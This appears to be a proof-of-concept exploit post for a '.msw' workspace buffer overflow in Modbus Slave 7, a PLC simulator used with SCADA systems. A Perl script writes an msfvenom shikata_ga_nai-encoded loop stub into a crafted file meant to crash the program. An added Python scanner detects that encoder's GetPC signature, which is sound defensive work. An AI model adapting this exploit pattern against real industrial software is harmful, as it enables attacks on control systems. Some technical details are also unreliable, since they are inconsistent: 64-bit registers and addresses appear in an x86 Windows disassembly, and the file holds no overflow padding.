Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
Source: vfocus.net  Author: Çapar  Published: 2018-10-30
# Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
# Author: Kağan Çapar
# Discovery Date: 2018-10-27
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Vendor Homepage : https://www.modbustools.com
# Tested Version: 7
# Tested on OS: Windows XP SP3 *ENG
# Other versions are likely affected as well
# About software: Modbus Slave is for simulating up to 32 slave devices in 32 windows.
# Speed up your PLC programming with this simulation tool. Used in SCADA systems.
# Modbus is a serial communications protocol originally published by Schneider Electric
# Steps to Reproduce: Run the Perl script below; it creates a new file named
# "exploit.msw". Drag that file onto "mbslave.exe" and the software enters
# a loop and crashes.
# Greetz : cwd-onkan-badko-key-akkus
 
#!/usr/bin/perl
 
# Dump of assembler code for function loop:
# 0x0000555555558030 <+0>:    mov    $0x1e3b563c,%ebx
# 0x0000555555558035 <+5>:    fld    %st(4)
# 0x0000555555558037 <+7>:    fnstenv -0xc(%rsp)
# 0x000055555555803b <+11>:   pop    %rax
# 0x000055555555803c <+12>:   sub    %ecx,%ecx
# 0x000055555555803e <+14>:   mov    $0x1,%cl
# 0x0000555555558040 <+16>:   xor    %ebx,0x14(%rax)
# 0x0000555555558043 <+19>:   add    $0x4,%eax
# 0x0000555555558046 <+22>:   add    0x10(%rax),%ebx
# 0x0000555555558049 <+25>:   fisubs 0xe0d0(%rbx)
 
# msfvenom -p generic/tight_loop --platform windows_86 -f perl -e x86/shikata_ga_nai
# print /x &loop
# $1 = 0x555555558030
 
use strict;
use warnings;

# Write the encoded loop stub shown above into a .msw workspace file;
# this file is the PoC's crash trigger.
open(my $code, '>', 'exploit.msw') or die "Cannot create exploit.msw: $!";
binmode($code);
my $loop =
"\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9" .
"\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0" .
"\xe0";

print $code $loop;
close($code) or die "Cannot close exploit.msw: $!";
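The disassembly above shows the GetPC trick that the shikata_ga_nai decoder relies on: an FPU instruction, `fnstenv -0xc(%esp)`, and a `pop` that recovers the stub's own address, followed by a `mov $imm8,%cl` that sets the decoder's loop count. That byte sequence is a well-known static signature for this encoder. The scanner below is an added example, not part of the original PoC and not a tool from the software vendor: it flags `d9 74 24 f4` followed closely by a `pop` in any file and, for each hit, reports the pop register and the loop count so an analyst can see how much the stub decodes. The sample input is the 29-byte stub from the script above, embedded inline; all function names are my own.

```python
"""Static scanner for the fnstenv/pop GetPC stub emitted by shikata_ga_nai.

Added example for detection; heuristic only. Stubs that use a different
fnstenv displacement or reorder the instructions will not match.
"""
import sys
from typing import Dict, List, Optional

# Constructed sample input: the encoded loop written by the PoC above.
POC_STUB = bytes.fromhex(
    "bb3c563b1ed9c4d97424f4582bc9"
    "b10131581483c004035810dea3d0"
    "e0"
)

FNSTENV_STUB = b"\xd9\x74\x24\xf4"  # fnstenv [esp-0xc]
POP_REGS = {0x58 + i: name for i, name in
            enumerate(["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}


def find_getpc_stubs(data: bytes, window: int = 4) -> List[int]:
    """Return offsets of fnstenv [esp-0xc] that are followed within `window`
    bytes by a pop reg: the GetPC sequence shown in the disassembly above."""
    hits: List[int] = []
    pos = data.find(FNSTENV_STUB)
    while pos >= 0:
        start = pos + len(FNSTENV_STUB)
        tail = data[start:start + window]
        if any(b in POP_REGS for b in tail):
            hits.append(pos)
        pos = data.find(FNSTENV_STUB, pos + 1)
    return hits


def describe_stub(data: bytes, offset: int, window: int = 4) -> Dict[str, object]:
    """For one hit, extract the pop register and, when the decoder's
    `mov cl, imm8` (0xb1 xx) follows, its loop count (dwords to decode)."""
    after = offset + len(FNSTENV_STUB)
    pop_at = next((i for i in range(after, min(after + window, len(data)))
                   if data[i] in POP_REGS), None)
    if pop_at is None:
        raise ValueError("no pop after fnstenv at offset %d" % offset)
    loop_count: Optional[int] = None
    mov_cl = data.find(b"\xb1", pop_at + 1, pop_at + 8)
    if mov_cl >= 0 and mov_cl + 1 < len(data):
        loop_count = data[mov_cl + 1]
    return {"offset": offset,
            "pop_register": POP_REGS[data[pop_at]],
            "loop_count": loop_count}


def scan_bytes(name: str, data: bytes) -> Dict[str, object]:
    """Scan one buffer and return a small report suitable for logging."""
    stubs = [describe_stub(data, off) for off in find_getpc_stubs(data)]
    return {"file": name, "size": len(data),
            "suspicious": bool(stubs), "stubs": stubs}


if __name__ == "__main__":
    # With no arguments, scan the embedded PoC stub; otherwise scan each file given.
    if len(sys.argv) == 1:
        print(scan_bytes("<constructed PoC stub>", POC_STUB))
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(scan_bytes(path, fh.read()))
```

Run it against a quarantined workspace file (`python scanner.py suspect.msw`); a hit with `loop_count` 1, as in the PoC, means the stub decodes only a single dword after its own code, which matches the tiny `tight_loop` payload described above rather than a full-sized second stage.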
 